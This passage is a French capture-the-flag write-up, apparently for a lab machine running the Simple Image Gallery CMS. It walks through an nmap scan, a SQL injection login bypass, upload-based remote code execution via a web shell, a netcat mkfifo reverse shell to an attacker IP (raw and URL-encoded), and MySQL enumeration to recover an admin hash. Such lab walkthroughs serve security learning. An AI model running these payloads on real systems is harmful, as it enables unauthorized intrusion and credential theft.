[Web]

Dans un premier temps, nous allons effectuer un scan nmap afin de découvrir les services disponibles et répondre à la première question.

Il y a donc 2 ports ouverts avec un cms très intéressant sur le port 8080 :

Ce blog est donc propulsé par le cms Simple Image Gallery

Après plusieurs recherches on trouve un exploit déjà préparé sur exploit-db !

Le processus est très simple :

Dans un premier temps, il s’agit de l’exploitation d’une SQL Injection sur le formulaire de login :

Cette dernière peut-être exploitée également à la main :

# SQLI Bypass Login
username : admin' OR 1=1 -- -
password : random

Dans un second temps, il s’agit d’une faille upload permettant une RCE :

Nous allons donc utiliser l’exploit pour gagner du temps :

C’est l’heure du reverse shell et pour ce faire nous allons url encoder ce dernier :

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.20.2 1234 >/tmp/f

# Payload reverse shell
http://10.10.7.161/gallery/uploads/1629904320_TagozwrwnipzjxfhroaLetta.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.11.20.2%201234%20%3E%2Ftmp%2Ff

Afin de récupérer le hash de l’administrateur nous devons regarder plus en détail le fichier initialize.php qui nous donne donc les identifiants de connexion à la base de données :

Après avoir énumérer cette dernière on y trouve bien le hash que l’on recherche :

mysql -u gallery_user -p
show databases;
use gallery_db;
show tables;
select * from users;

[User]

Après énumération on trouve un dossier très intéressant dans le répertoire /var/backups :

On peut donc retrouver un backup d’une partie du home de mike cependant nous pouvons tout lire et même le bash_history qui nous révèle l’erreur de mike..